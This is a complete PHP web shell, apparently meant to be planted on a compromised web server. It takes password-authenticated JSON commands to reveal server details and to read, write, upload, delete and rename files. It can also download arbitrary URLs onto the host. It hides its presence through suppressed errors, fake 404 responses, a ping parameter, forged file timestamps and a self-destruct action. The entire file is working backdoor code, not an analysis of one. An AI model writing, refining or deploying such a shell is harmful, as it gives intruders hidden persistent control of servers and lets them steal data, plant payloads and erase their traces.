<?php
error_reporting(0);
ini_set('display_errors', 0);

if (function_exists('opcache_invalidate')) {
    opcache_invalidate(__FILE__, true);
}

header('Cache-Control: no-cache, no-store, must-revalidate');
header('Pragma: no-cache');
header('Expires: 0');

define('PASSWORD_MD5', '2411d8ecf5698fc8f04480c7eb1c5ffe');
define('AGENT_VERSION', '1.2.3');

function authenticate($password) {
    return md5($password) === PASSWORD_MD5;
}

if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['keke'])) {
    header('Content-Type: text/plain; charset=utf-8');
    echo '.';
    exit();
}

header('Content-Type: application/json; charset=utf-8');

$input = file_get_contents('php://input');
if (empty($input)) {
    http_response_code(404);
    die();
}

$data = json_decode($input, true);
if (!$data || !isset($data['auth']) || !isset($data['actions'])) {
    http_response_code(400);
    die(json_encode(['error' => 'Invalid request']));
}

if (!authenticate($data['auth'])) {
    http_response_code(401);
    die(json_encode(['error' => 'Unauthorized']));
}

$responses = [];
foreach ($data['actions'] as $actionData) {
    $action = $actionData['action'];
    $actionParams = $actionData['data'] ?? [];
    
    $response = ['success' => false, 'action' => $action];

switch ($action) {
    case 'info':
        $response = [
            'success' => true,
            'agent_version' => AGENT_VERSION,
            'php_version' => phpversion(),
            'server' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown',
            'cwd' => getcwd(),
            'user' => function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid())['name'] : 'Unknown',
            'document_root' => $_SERVER['DOCUMENT_ROOT'] ?? getcwd(),
            'script_dir' => dirname(__FILE__)
        ];
        break;

    case 'phpinfo':
        ob_start();
        phpinfo();
        $phpinfo = ob_get_contents();
        ob_end_clean();
        
        $response = [
            'success' => true,
            'phpinfo' => base64_encode($phpinfo)
        ];
        break;

    case 'list':
        $path = isset($actionParams['path']) ? realpath($actionParams['path']) : getcwd();
        if (!$path || !is_dir($path)) {
            $response = ['success' => false, 'error' => 'Invalid path'];
            break;
        }
        
        $items = [];
        $handle = opendir($path);
        while (($item = readdir($handle)) !== false) {
            if ($item === '.' || $item === '..') continue;
            
            $fullPath = $path . DIRECTORY_SEPARATOR . $item;
            $stat = @stat($fullPath);
            
            $owner = 'Unknown';
            $group = 'Unknown';
            if ($stat && function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
                $ownerInfo = posix_getpwuid($stat['uid']);
                $groupInfo = posix_getgrgid($stat['gid']);
                $owner = $ownerInfo ? $ownerInfo['name'] : $stat['uid'];
                $group = $groupInfo ? $groupInfo['name'] : $stat['gid'];
            }
            
            $items[] = [
                'name' => $item,
                'type' => is_dir($fullPath) ? 'dir' : 'file',
                'size' => $stat ? $stat['size'] : 0,
                'mtime' => $stat ? $stat['mtime'] : 0,
                'perms' => $stat ? decoct($stat['mode'] & 0777) : '000',
                'writable' => is_writable($fullPath),
                'owner' => $owner,
                'group' => $group
            ];
        }
        closedir($handle);
        
        usort($items, function($a, $b) {
            if ($a['type'] === $b['type']) {
                return strcasecmp($a['name'], $b['name']);
            }
            return $a['type'] === 'dir' ? -1 : 1;
        });
        
        $response = [
            'success' => true,
            'action' => $action,
            'path' => $path,
            'items' => $items
        ];
        break;

    case 'read':
        $path = isset($actionParams['path']) ? realpath($actionParams['path']) : null;
        if (!$path || !is_file($path) || !is_readable($path)) {
            $response = ['success' => false, 'error' => 'Cannot read file'];
            break;
        }
        
        $content = file_get_contents($path);
        $response = [
            'success' => true,
            'content' => base64_encode($content),
            'size' => strlen($content),
            'mtime' => filemtime($path),
            'encoding' => 'utf-8'
        ];
        break;

    case 'write':
        $path = isset($actionParams['path']) ? realpath($actionParams['path']) : null;
        if (!$path || !is_file($path) || !is_writable($path)) {
            $response = ['success' => false, 'error' => 'Cannot write file'];
            break;
        }
        
        $content = base64_decode($actionParams['content']);
        $originalMtime = isset($actionParams['preserve_mtime']) ? filemtime($path) : null;
        
        if (file_put_contents($path, $content) !== false) {
            if ($originalMtime && isset($actionParams['preserve_mtime'])) {
                touch($path, $originalMtime);
            }
            $response = ['success' => true];
        } else {
            $response = ['success' => false, 'error' => 'Write failed'];
        }
        break;

    case 'upload':
        $path = isset($actionParams['path']) ? $actionParams['path'] : null;
        $dir = dirname($path);
        
        if (!$path || !is_dir($dir) || !is_writable($dir)) {
            $response = ['success' => false, 'error' => 'Invalid upload path'];
            break;
        }
        
        $content = base64_decode($actionParams['content']);
        if (file_put_contents($path, $content) !== false) {
            if (isset($actionParams['mtime'])) {
                touch($path, $actionParams['mtime']);
            }
            $response = ['success' => true];
        } else {
            $response = ['success' => false, 'error' => 'Upload failed'];
        }
        break;

    case 'download_url':
        $url = isset($actionParams['url']) ? $actionParams['url'] : null;
        $path = isset($actionParams['path']) ? $actionParams['path'] : null;
        
        if (!$url || !$path) {
            $response = ['success' => false, 'error' => 'Missing parameters'];
            break;
        }
        
        $dir = dirname($path);
        if (!is_dir($dir) || !is_writable($dir)) {
            $response = ['success' => false, 'error' => 'Invalid path'];
            break;
        }
        
        $content = @file_get_contents($url);
        if ($content === false) {
            $response = ['success' => false, 'error' => 'Download failed'];
            break;
        }
        
        if (file_put_contents($path, $content) !== false) {
            $response = ['success' => true, 'size' => strlen($content)];
        } else {
            $response = ['success' => false, 'error' => 'Write failed'];
        }
        break;

    case 'delete':
        $path = isset($actionParams['path']) ? realpath($actionParams['path']) : null;
        if (!$path) {
            $response = ['success' => false, 'error' => 'Invalid path'];
            break;
        }
        
        if (is_dir($path)) {
            function rrmdir($dir) {
                $objects = scandir($dir);
                foreach ($objects as $object) {
                    if ($object != "." && $object != "..") {
                        if (is_dir($dir . "/" . $object)) {
                            rrmdir($dir . "/" . $object);
                        } else {
                            unlink($dir . "/" . $object);
                        }
                    }
                }
                return rmdir($dir);
            }
            $response = ['success' => rrmdir($path)];
        } else {
            $response = ['success' => unlink($path)];
        }
        break;

    case 'touch':
        $path = isset($actionParams['path']) ? realpath($actionParams['path']) : null;
        $mtime = isset($actionParams['mtime']) ? intval($actionParams['mtime']) : time();
        
        if (!$path || (!is_file($path) && !is_dir($path))) {
            $response = ['success' => false, 'error' => 'Invalid file or directory'];
            break;
        }
        
        $response = ['success' => touch($path, $mtime)];
        break;

    case 'mkdir':
        $path = isset($actionParams['path']) ? $actionParams['path'] : null;
        
        if (!$path) {
            $response = ['success' => false, 'error' => 'Path required'];
            break;
        }
        
        $dir = dirname($path);
        if (!is_dir($dir) || !is_writable($dir)) {
            $response = ['success' => false, 'error' => 'Parent directory not writable'];
            break;
        }
        
        if (file_exists($path)) {
            $response = ['success' => false, 'error' => 'Path already exists'];
            break;
        }
        
        $response = ['success' => @mkdir($path, 0755)];
        if (!$response['success']) {
            $response['error'] = 'Failed to create directory';
        }
        break;

    case 'create_file':
        $path = isset($actionParams['path']) ? $actionParams['path'] : null;
        $content = isset($actionParams['content']) ? $actionParams['content'] : '';
        
        if (!$path) {
            $response = ['success' => false, 'error' => 'Path required'];
            break;
        }
        
        $dir = dirname($path);
        if (!is_dir($dir) || !is_writable($dir)) {
            $response = ['success' => false, 'error' => 'Parent directory not writable'];
            break;
        }
        
        if (file_exists($path)) {
            $response = ['success' => false, 'error' => 'File already exists'];
            break;
        }
        
        $result = @file_put_contents($path, $content);
        $response = ['success' => $result !== false];
        if (!$response['success']) {
            $response['error'] = 'Failed to create file';
        }
        break;

    case 'rename':
        $oldPath = isset($actionParams['old_path']) ? realpath($actionParams['old_path']) : null;
        $newPath = isset($actionParams['new_path']) ? $actionParams['new_path'] : null;
        
        if (!$oldPath || !$newPath) {
            $response = ['success' => false, 'error' => 'Both old_path and new_path required'];
            break;
        }
        
        if (!file_exists($oldPath)) {
            $response = ['success' => false, 'error' => 'Source path does not exist'];
            break;
        }
        
        $newDir = dirname($newPath);
        if (!is_dir($newDir) || !is_writable($newDir)) {
            $response = ['success' => false, 'error' => 'Target directory not writable'];
            break;
        }
        
        if (file_exists($newPath)) {
            $response = ['success' => false, 'error' => 'Target path already exists'];
            break;
        }
        
        $response = ['success' => @rename($oldPath, $newPath)];
        if (!$response['success']) {
            $response['error'] = 'Failed to rename';
        }
        break;


    case 'self_destruct':
        $selfPath = __FILE__;
        
        if (function_exists('opcache_invalidate')) {
            opcache_invalidate($selfPath, true);
        }
        
        $response = ['success' => true, 'message' => 'Self destruct initiated'];
        $responses[] = $response;
        
        echo json_encode($responses, JSON_UNESCAPED_UNICODE);
        
        @unlink($selfPath);
        
        exit();
        break;

    default:
        $response = ['success' => false, 'error' => 'Unknown action'];
}

    $responses[] = $response;
}

echo json_encode($responses, JSON_UNESCAPED_UNICODE);